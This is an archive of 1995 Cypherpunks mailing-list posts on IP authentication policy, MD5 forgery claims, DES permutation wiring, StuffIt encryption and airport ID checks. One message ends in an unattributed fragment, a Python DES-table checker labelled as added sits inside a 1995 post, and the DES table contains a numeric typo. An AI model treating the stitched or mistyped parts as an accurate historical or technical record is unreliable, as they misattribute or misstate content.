Date: Wed, 25 Oct 95 06:35:31 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: RE: Does your software?
Message-ID: <1995Oct25.091900.1151.341101@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Peter Wayner[SMTP:pcw@access.digex.net]
Sent:  Tuesday, October 24, 1995 2:33 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: Does your software?



>My get-only server is available in source form, is 80 lines long and
>thus easily understood, has been shown to meet security properties, is
>now in the process of being mathematically proven to meet those
>properties, and is published in a refereed journal which can be used to
>confirm its contents in detail.  Hence, I do provide secure distribution
>through purely physical means.
>
Uh, proofs only go so far. There was one Cornell CS professor who was a
real devotee of "proving" your programs correct. He even published one of
his proofs in a "refereed" journal. Big whoop. It still had an error.

Proofs can help identify flaws, but they can never rule out all flaws.
That's why their name is so bogus. I wouldn't be surprised if you could
prove that the Finger daemon, which is sort of like a really low-level
GET-ONLY HTTP server, is also safe. In fact, your math proving ability
could probably even prove the pre-Robert Morris finger daemon is safe and
secure. If programmers don't think of preventing finger requests longer
than 512 bytes then why should the head-in-the-clouds program provers?

 - Peter


>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

P.S. "FC" is your log in and "FC" is found inscribed in the writings of the
Unabomber. Coincidence?





on't speak
officially, were to be torn apart and the ulterior motives speculated upon,
I'd either shut up on this list or get off it completely. (Recall that we
had Marc Andreessen on this list last December--for whatever reasons, and
there are likely several, he left. I recall many attacks on his company. He
perhaps figured "What the hell do I need this for?")

Legitimate, scientific analysis is commendable. The brute force attack on
Netscape was great, and even better was the random seed attack. But many of
the attacks are less solid:

"How can you people at Digital Datawhack produce such crap? The assumptions
you make in the Flogisticon module are disgusting, another example of
security through obscenity."

(What I think this piling on is likely to accomplish is to push company
list subscribers here to just shut up. They see that the more is said by
folks from Netscape, as the best current example, the more fireworks and
insults ensue. The less that is said the better. This is not a good
situation.)

I'm not arguing for "niceness," just that some of the edge be taken off the
attacks.

The "bounties" that are being offered in press releases have the danger of
inviting premature announcement of results. And of discouraging companies
from actively participating in this list and discussing what might be done
to improve security.

Just my views. No doubt some will think I'm a shill for some company.

 --Tim May



Views here are not the views of my Internet Service Provider or Government.
 ---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:50 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: RE: Don't Kill the Messenger--A New Slan
Message-ID: <1995Oct25.093456.1151.341104@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Scott Brickner[SMTP:sjb@universe.digex.net]
Sent:  Tuesday, October 24, 1995 12:59 PM
To:  Adam Shostack
Cc:  Cypherpunks Mailing List
Subject:  Re: Don't Kill the Messenger--A New Slant on Remailers


Adam Shostack writes:
> Who cares if you can read messages encrypted to the key or
>not?  Let everyone connect and download whatever messages they want to
>see.  They're encrypted, after all.

Two reasons.  One, it cuts down on traffic.  Why bother to waste the
server's bandwidth on something the client can't read anyway.  The only
possible reason someone could be asking for the data is because they're
trying to compromise the key or do traffic analysis.  Why help bad
guys?

Second, there's no reason the messages need to be encrypted.  The
server can accept messages addressed to *any* string of eight hex
digits, and doesn't care about the content.  The server needn't limit
the kinds of encryption used in the actual message.  It only cares that
the recipient is "really" (in some sense) the right receiver.

The original mental prompt for the idea came from the discussion of
the "key-is-the-person" model.  I was trying to devise a scenario where
it was possible to know of an entity only through his key, and came up
with this.  I also included the idea that messages signed by the key
would be forwarded by the server after being pseudonymized to the
keyid.  That way, the user could participate in mailing lists purely
identified by the key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:38:39 PDT
To: tcmay@got.net (tcmay)
Subject: RE: Crypto's Role in Evil?
Message-ID: <1995Oct25.093710.1151.341115@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Carl Ellison[SMTP:cme@TIS.COM]
Sent:  Tuesday, October 24, 1995 12:52 PM
To:  tcmay
Cc:  cypherpunks
Subject:  Re: Crypto's Role in Evil?

Sender: owner-cypherpunks@toad.com
Precedence: bulk

>Date: Mon, 9 Oct 1995 11:20:41 -0700

I'm late getting to my mail backlog.

>From: tcmay@got.net (Timothy C. May)


>It's clear that cops cannot protect people, only try to catch the
>perpetrators.

I heard a particularly scary quote from Director Freeh last Sunday on NPR's
Weekend Edition (I believe that was the show -- segment A-1) in which he
declared "our job is to protect the people".

If that were the FBI's job, then we'd have to look at it as one does to a
loving parent and give it all the authority and respect a child gives a
parent.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 25 Oct 95 06:56:13 PDT
To: agermain@cmp.com
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <9510251351.AA17177@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> I have unsubscribed from this mailing list. Please remove my name from   
> your personal address lists. Thanks.
> 
> ahg3

We heard you the first 15 times, Einstein.

   --D.

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 24 Oct 95 17:16:29 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <199510242256.AA20036@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue. 

From memory that particular attack had more to do with altered operating
systems which reported back the correct information than anything to do with
a md5 hole. It is much easier to tell a program to say "abcdef" than it is
to come up with a series of bits that hash to the same md5 result as another
series of bits.

Keep trying Fred... you may get somewhere one day.

Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Oct 95 06:55:27 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510251119.AA23193@all.net>
Message-ID: <199510251358.JAA24328@homeport.org>
MIME-Version: 1.0
Content-Type: text


	This is a failure in the (TCP wrappers?) that should be
reconfigured.

	Since the service you are providing is available without any
authentication, there is no reason to match hostnames to IPs with a
double reverse lookup.

	Since your server is secure, what does it really matter where
the connections are coming from?  If netscape chooses to hide host
information, they should be allowed to.

	Cypherpunk relevance?  It's wrong to demand authentication when
you don't care.  Airports, bars, 'anonymous' FTP servers and the like
should all take the level of authentication they need.

Adam


| If so, your firewall (or other mechanism) is presenting an incomplete
| falsehood about the mapping between your host name and your IP address.
| 
| Oct 24 21:19:15 all in.thttpd[20865]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
| Oct 24 21:19:15 all in.thttpd[20865]: refused connect from 198.95.250.69

| My server refuses connections from hosts when the IP address doesn't
| match to the host name.  This is a common method for reducing the level
| of address forgery on the Internet.  Please ask your firewall manager to
| repair the firewall so we can authenticate you.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 25 Oct 95 07:05:43 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I agree strongly with Tim May that this (fun) little joke has gone far
enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
the experience, post it on the web somewhere (I'll provide a space if you
need it), and call it a day. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 07:09:01 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Re: Does your software?
In-Reply-To: <199510251358.JAA24328@homeport.org>
Message-ID: <9510251406.AA10301@all.net>
MIME-Version: 1.0
Content-Type: text


> 	This is a failure in the (TCP wrappers?) that should be
> reconfigured.

That's a policy decision, not a technical one.  The policy I have
decided to follow is that I don't support people with non-authenticable
IP addresses.  I feel it is in the best interest of the Internet and of
the organizations using the Internet (like Netscape) that I prevent
people from claiming to be from Netscape with possibly forged IP
addresses.  You should feel free to make your policy decisions as
you feel best, while I certainly exercise that freedom on my end.

> 	Since the service you are providing is available without any
> authentication, there is no reason to match hostnames to IPs with a
> double reverse lookup.

That's not right.  My service requires authentication in the sense of
not allowing obviously forged IP addresses.  The audit trails generated
by the process allow me to my services, send mail (when people use the
ident daemon) about improvements.  For example, there was an
inaccessible file due to an error on my part - my automated error
detection system popped the error up on the screen within a few seconds,
I investigated, fixed the protection setting, and sent email to the
person letting them know that the file was now accessible and that it
was my fault.  This is also used as part of the identification process
used to assure that information is not sent to locations where I am
aware it is illegal to send it.  For example, Singapore has restrictions
that make it illegal to send them certain things, and I check for their
addresses as part of my access controls - made feasible via the IP
address verification process.

> 	Since your server is secure, what does it really matter where
> the connections are coming from?  If netscape chooses to hide host
> information, they should be allowed to.

Because secure means more than "you can't harm me by using it".  It
implies integrity, availability, confidentiality, and redundancy to
provide assurance that those things are the case.  It implies not only
keeping my site from being attacked, but trying to obey the laws of
countries from all over the world, keeping my site from being used to
attack other sites, limiting legal liabilities, and on and on.  If
someone chooses to use a non-verifiable network address, I choose to
not provide services.

> 	Cypherpunk relevance?  It's wrong to demand authentication when
> you don't care.  Airports, bars, 'anonymous' FTP servers and the like
> should all take the level of authentication they need.

It's wrong to make assumptions about what I care about when you haven't
asked me.  I care about you and everyone else using the Internet.  I
care enough to help prevent forgeries by not supporting them, and to
help people debug their (perhaps faulty) firewalls by identifying the
source of problems and helping them resolve them.  I think that
authentication at some level is appropriate for anyone who uses
computers, even anonymously.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 07:27:04 PDT
To: cypherpunks@toad.com
Subject: BSDC: Designing Systems for Electronic Commerce
Message-ID: <v02120d00acb3ef808714@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Boston Society for Digital Commerce

                               Presents

                              Win Treese
                            Open Market, Inc.

                 Designing Systems for Electronic Commerce


                        Tuesday, November 7, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Win Treese is Director of Security and Advanced Technology for Open
Market, Inc., a startup company building systems and software for
electronic commerce on open networks.  Before joining Open Market, he
was a member of the research staff at the Cambridge Research
Laboratory of Digital Equipment Corporation, where he worked on a
variety of projects, including the design and implementation of
Digital's Internet firewall system and the AudioFile network audio
system.

Win says:

>"Electronic commerce" is a short name for a big topic. In this talk I
>will describe Open Market's Transaction Management System and other
>components that can be used in many different applications, such as
>ordering of retail products for delivery, subscription access to
>information, "pay-per-page" purchasing of information, and others. In
>addition to payment, I will discuss other issues that arise in
>commerce, such as customer service and content management.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, November 7, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
November 4 (that's one week from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.


November's speaker will be Art Hutchinson of Northeast Consulting Resources,
Inc.


We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the BSDC Program Committee care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info bsdc" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Interim Moderator,
The Boston Society for Digital Commerce





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI5Iw/gyLN8bw6ZVAQF3FQP+LxoCbP4AoijIMobOVE1PzX066WrmvwMb
pSaSpBP4F7/XJ0NP2EdKDZw24xpqxrvKm6j+FDzC3dDWcR3zlZPeEjvIGSFpNDW4
QJhGDlBfDo8LPAp9ua28CwxDSeyFmUZcMIjh7cgVOjCuG9Gegkn0jO3MihtrDb7U
yki9gTYDaNw=
=2VH9
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 25 Oct 95 10:44:15 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: textbooks
Message-ID: <9510251744.AA23624@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


IP/FP and PC1 describe how to get from input bytes to L, R, C and D Blocks:

 
The Initial Permutation
 
The Initial Permutation (IP) is a description of how a byte wide interface is
connected to a 64 bit block comprised of two 32 bit blocks (L and R).  Consider
a byte wide interface with the bits numbered 1-8.  The even numbered bits
go to the L Block and the odd numbered bits go to the R block.  Note that the
bit order is big endian, where bit 1 is most significant and bit 8 is least
significant.  The input block is typically loaded as 8 successive byte
loads:
 
Port    MSB7            Input  (LR)                     Left
 Bit    Bit             Block (64 bits)                 Block (32 bits)
 
  2------6-------58 50 42 34 26 18 10  2                 1  2  3  4  5  6  7  8
  4------4-------60 52 44 36 28 20 12  4                 9 10 11 12 13 14 15 16
  6------2-------62 54 46 38 30 22 14  6                17 18 19 20 21 22 23 24
  8------0-------64 56 48 40 32 24 16  8                25 26 27 28 29 30 31 32
 
                                                        Right
                                                        Block (32 bits)
  1------7-------57 49 41 33 25 17  9  1                 1  2  3  4  5  6  7  8
  3------5-------59 51 43 35 27 19 11  3                 9 10 11 12 13 14 15 16
  5------3-------61 53 45 37 29 21 13  5                17 18 19 20 21 22 23 24
  7------1-------63 55 47 39 31 23 15  7                25 26 27 28 29 30 31 32
 
Input Byte        8  7  6  5  4  3  2  1
 
The Final Permutation
 
The Final Permutation (IP-1) provides the inverse, it standardizes the output
of the R16L16 output block to a byte wide interface.  The Output block is
ordered Right then Left to allow complementary operation for subsequent
decryption.  Were one to perform an IP followed by IP-1 without any intervening
round iteration operations, one would end up with odd and even bits swapped:
 
Right                           Output (R16L16)               Standard  Port
Block (32 bits)                 Block   (64 bits)               Bit      Bit
 
 1  2  3  4  5  6  7  8          1  2  3  4  5  6  7  8---------6--------2
 9 10 11 12 13 14 15 16          9 10 11 12 13 14 15 16---------4--------4
17 18 19 20 21 22 23 24         17 18 19 20 21 22 23 24---------2--------6
25 26 27 28 29 30 31 32         25 26 27 28 29 30 31 32---------0--------8
 
Left
Block (32 bits)
 
 1  2  3  4  5  6  7  8         33 34 35 36 37 38 39 40---------7--------1
 9 10 11 12 13 14 15 16         41 42 43 44 45 46 47 48---------5--------3
17 18 19 20 21 22 23 24         49 50 51 52 53 54 55 56---------3--------5
25 26 27 28 29 30 31 32         57 58 59 60 61 62 63 64---------1--------7
 
Output Byte                      8  7  6  5  4  3  2  1
 
 
From FIPS Pub 46-2:
 
Final Permutation IP-1:
                                   Output Byte
40  8 48 16 56 24 64 32                 1
39  7 47 15 55 23 63 31                 2
38  6 46 14 54 22 62 30                 3
37  5 45 13 53 21 61 29                 4
36  4 44 12 52 20 60 28                 5
35  3 43 11 51 19 59 27                 6
34  2 42 10 50 18 58 26                 7
33  1 41  9 49 17 57 25                 8
 
 1  2  3  4  5  6  7  8 Port Bit
 7  6  5  4  3  2  1  0 MSB7 Bits
 
In the simplest hardware implementation of DES, the Left and Right blocks are
comprised in hardware of four 8 bit registers each.  Each 8 bit register can be
serially loaded (IP), serially unloaded (IP-1), or parallel output and parallel
loaded (round iteration).  DES is an encryption algorithm originally required
to be implemented in hardware, specified in 1977 - predating 16 or 32 bit
microprocessor peripherals.
 
Permuted Choice 1
 
PC1 performs a similar function loading the C and D 28 bit registers (comprised
of three 8 bit bidirectional shift registers and 1 4 bit bidirectional shift
register, all with parallel outputs).  The C and D registers can be serially
loaded (shifting right), or serially shifted left or right in a closed ring
for encryption or decryption.
 
Port    MSB7                                                                
Bits     Bits                                                           
                           
                Input   (CD)                            C
                        Block, 64 bits                  Block (28 bits)
 
1--------7------57 49 41 33 25 17  9  1         MS       1  2  3  4  5  6  7  8
2--------6------58 50 42 34 26 18 10  2                  9 10 11 12 13 14 15 16
3--------5------59 51 43 35 27 19 11  3                 17 18 19 20 21 22 23 24
4--------4------60 52 44 36 ----------- (C(28))         25 26 27 28
 
                                                        D
                                                        Block (28 bits)
 
7--------1------63 55 47 39 31 23 15  7                  1  2  3  4  5  6  7  8
6--------2------62 54 46 38 30 22 14  6                  9 10 11 12 13 14 15 16
5--------3------61 53 45 37 29 21 33  5                 17 18 19 20 21 22 23 24
4-------(D(25)--------------28 20 12  4                 25 26 27 28
 
8--------0------64 56 48 40 32 24 16  8         LS      (parity)
 
Input Byte      8  7  6  5  4  3  2   1 
 
Note that bit 4 is used as input for both C and D.  This implies that C(28)
output is used as the serial input to D(25).  The least significant bit is
used for odd parity.
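
The wiring described in this message can be checked mechanically.  The
following is an added example, not part of the original post: it rebuilds
IP, IP-1 and PC1 from the port-bit and input-byte layout, compares them with
the FIPS 46 tables, and shows the odd/even swap when no rounds are run.  The
function names are hypothetical, and the reference tables are typed in from
the standard.

```python
# Added example: derive DES IP, IP-1 and PC1 from the byte-wide wiring and
# compare with the FIPS 46 tables (typed in here from the standard).

FIPS_IP = [
    58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4,
    62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8,
    57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3,
    61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7,
]
FIPS_FP = [
    40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31,
    38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,
    36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27,
    34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25,
]
FIPS_PC1 = [
    57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18,
    10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36,
    63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22,
    14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4,
]

# Port bits in the order their register rows appear: even bits feed L,
# odd bits feed R (port bit 1 is the most significant bit of each byte).
ROW_ORDER = (2, 4, 6, 8, 1, 3, 5, 7)


def bit_no(byte, port_bit):
    """FIPS bit number (1..64) of a port bit of input byte 1..8."""
    return 8 * (byte - 1) + port_bit


def serial_row(port_bit, byte_order=range(8, 0, -1)):
    """Contents of one shift register, listed in the tables' column order."""
    return [bit_no(b, port_bit) for b in byte_order]


def build_ip():
    return [n for p in ROW_ORDER for n in serial_row(p)]


def build_fp():
    # Output byte k, port bit p reads row ROW_ORDER.index(p), column 8-k
    # of the 64 bit R16L16 block (R rows first, then L rows).
    return [8 * ROW_ORDER.index(p) + 9 - k
            for k in range(1, 9) for p in range(1, 9)]


def build_pc1():
    # C takes port bits 1, 2, 3 and the upper four bytes of port bit 4;
    # D takes port bits 7, 6, 5 and the lower four bytes of port bit 4.
    c = (serial_row(1) + serial_row(2) + serial_row(3)
         + serial_row(4, range(8, 4, -1)))
    d = (serial_row(7) + serial_row(6) + serial_row(5)
         + serial_row(4, range(4, 0, -1)))
    return c + d


def to_bits(data):
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def from_bits(bits):
    out = bytearray()
    for i in range(0, len(bits), 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def permute(bits, table):
    return [bits[n - 1] for n in table]


def ip_fp_without_rounds(block):
    """Load through IP, run zero rounds, unload R then L through IP-1."""
    lr = permute(to_bits(block), build_ip())
    left, right = lr[:32], lr[32:]
    return from_bits(permute(right + left, build_fp()))


def swap_adjacent_bits(value):
    """Swap port bits 1<->2, 3<->4, 5<->6, 7<->8 of one byte."""
    return ((value & 0xAA) >> 1) | ((value & 0x55) << 1)


def odd_parity_ok(key):
    """Port bit 8 of every key byte must make the byte's bit count odd."""
    return all(bin(b).count("1") % 2 == 1 for b in key)


if __name__ == "__main__":
    sample = bytes.fromhex("0123456789abcdef")  # constructed sample block
    print("IP matches FIPS: ", build_ip() == FIPS_IP)
    print("IP-1 matches FIPS:", build_fp() == FIPS_FP)
    print("PC1 matches FIPS: ", build_pc1() == FIPS_PC1)
    print("no rounds:", sample.hex(), "->", ip_fp_without_rounds(sample).hex())
    print("odd parity:", odd_parity_ok(sample))
```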




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 25 Oct 95 09:05:14 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: Does your software?
In-Reply-To: <199510251358.JAA24328@homeport.org>
Message-ID: <Pine.SUN.3.90.951025105835.29240A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I must disagree here and side with *gasp* FC.
If your so called *secure* server happens to get broken into by grace of
god, you want to know at least where the attack came from. If Netscape
wants to hide internet hostnames they would do well setting up two DNS
servers, one for internal resolutions where IPs resolve to their real
hostname, and one in front of the firewall that resolves all IP's to
unkown.netscape.com.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 25 Oct 1995, Adam Shostack wrote:

> 	This is a failure in the (TCP wrappers?) that should be
> reconfigured.
> 
> 	Since the service you are providing is available without any
> authentication, there is no reason to match hostnames to IPs with a
> double reverse lookup.
> 
> 	Since your server is secure, what does it really matter where
> the connections are coming from?  If netscape chooses to hide host
> information, they should be allowed to.
> 
> 	Cypherpunk relevance?  It's wrong to demand authentication when
> you don't care.  Airports, bars, 'anonymous' FTP servers and the like
> should all take the level of authentication they need.
> 
> Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: leonardr@aladdinsys.com (Leonard Rosenthol)
Date: Wed, 25 Oct 95 11:01:57 PDT
To: Marshall Clow <tbyfield@panix.com (t byfield)
Subject: Re: Quick commercial package question
Message-ID: <v02130536acb3c756715c@[204.147.235.198]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 10/24/95, Marshall Clow wrote:
>>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin
>>
        I also just checked this out, and as the engineer currently
responsible for StuffIt (and having worked on it for a number of years), I
can tell you that the thing simply won't work as documented.   I'll even
explain why...

        StuffIt actually encrypts data (it doesn't just password protect
it), but it does so using a COMPLETELY RANDOM key and then that random key
is encrypted using the password that the user entered (user key) and then
stored in the MKey resource.  We do this so that the same file encrypted
with the same "user key" doesn't generate the same data (and therefore aid
in easier breaking).   So replacing an archive's MKey resource only
means that you can manipulate an encrypted archive (delete things, etc.)
BUT it still won't decrypt your data, since the original encryption key is
not present.

        If you know the person who wrote or posted the information, please
feel free to forward my message along to him.


Thanks,
Leonard Rosenthol

-----------------------------------------------------------------------------
Leonard Rosenthol                     Internet:        leonardr@aladdinsys.com
Director of Advanced Technology       AppleLink:       MACgician
Aladdin Systems, Inc.                 America Online:  MACgician






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 25 Oct 95 08:11:20 PDT
To: <cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <9510251511.AA22095@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Another data point:

This week I flew TWA from Boston to St. Louis, then TW Express from
St. Louis to Champaign, Ill, and back.

I was asked for picture ID when boarding at Boston, but at no other time.
I protested, and was told that my alternative was not to fly. Since I was
travelling on business and my employer's dime, I did not want to risk
missing the flight, so I complied.

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 25 Oct 95 09:50:48 PDT
To: jirib@cs.monash.edu.au
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510250657.QAA10183@sweeney.cs.monash.edu.au>
Message-ID: <199510251650.MAA24629@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes:
>.u'u I believe that you were wrong when you expressed a symbol for the
>list of forms of structure words. There are also words of the form V'V.
>
>On the other hand, however, not all letter combinations are permitted;
>eg there are only fourteen diphthongs (of which only four are "normal").

Well, I was definitely oversimplifying things.

>> The grammar of the language is *so* regularized that they are able to
>> give a YACC description for it.
>
>Yeah, and a huge beast it is. If you can make a YACCable language with
>one page of rules (say 16 :-) ), *then* I'll be impressed.

I'm sure that one could be done on one page, but I doubt it would have
the expressive power of a natural language *and* the lack of ambiguity
of Lojban.

>Would you believe two grammars for mathematical expressions? No? Good!
>There are three (infix, prefix and postfix).

And there's feedback between MEX and the non-MEX grammar since there
are cmavo which convert MEX into sumti and selbri and vice versa.

>> A message written entirely using native Lojban words can be encrypted
>> in a codebook fashion where the particular codebook to be used is a
>...
>
>You have to be careful here - the structure words (cmavo) are divided
>into groups (selma'o) which have different grammatical functions.
>You can't mix up members of different selma'o (in general), so you'd
>have to permute within each separately.
>
>Some of these selma'o have very few members (even just one) and/or
>may of themselves reveal information.

To achieve the goal of the cryptosystem it may not be necessary to
encode the cmavo, since they have no real meaning on their own, just
the gismu and rafsi.  The goal is to hide the *meaning*, not the
structure.

The selma'o that only have one member are especially meaning-free, as
they're typically elidable terminators and such.

>> This system has the interesting property that *any* plaintext with the
>> same grammatical structure is a potential encryption of a given
>> cyphertext.
>...
>
>Yes, but the grammatical structure itself may reveal heaps.
>(Except for trivial statements.)

In a natural language this might be true, but in Lojban the grammar's
regularity eliminates much of this information.  In English it's
"strange" to say "the red big dog", while "the big red dog" is fine.
Lojban doesn't have these features.  Lojban bridi are essentially
the same as function calls in a programming language, from a grammatical
perspective.  The only distinguishing feature of a selbri is the number
of sumti that it takes, and it's unusual for all of them to be specified,
and extra ones may be added using the BAI selma'o.

>> This works well in Lojban because it never changes word forms based on
>> grammatical usage.  Most natural language declensions and conjugations
>> would make the encrypted message ungrammatical, and make it *much* more
>...
>
>Not really; you just need to make sure that you conjugate the coded words.
>(Ie substitute nouns for nouns, verbs for verbs, etc.)

Irregularities make this nearly impossible for computers, though.

There are also problems due to ambiguity.

The even bigger inconvenience with natural languages comes in defining
the codebook.  The limited forms of Lojban gismu and rafsi makes the
whole dictionary a well-defined list, permitting the codebook to be
specified as a single number that anyone could use --- even without
prior exchange of the wordlist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 25 Oct 95 11:58:17 PDT
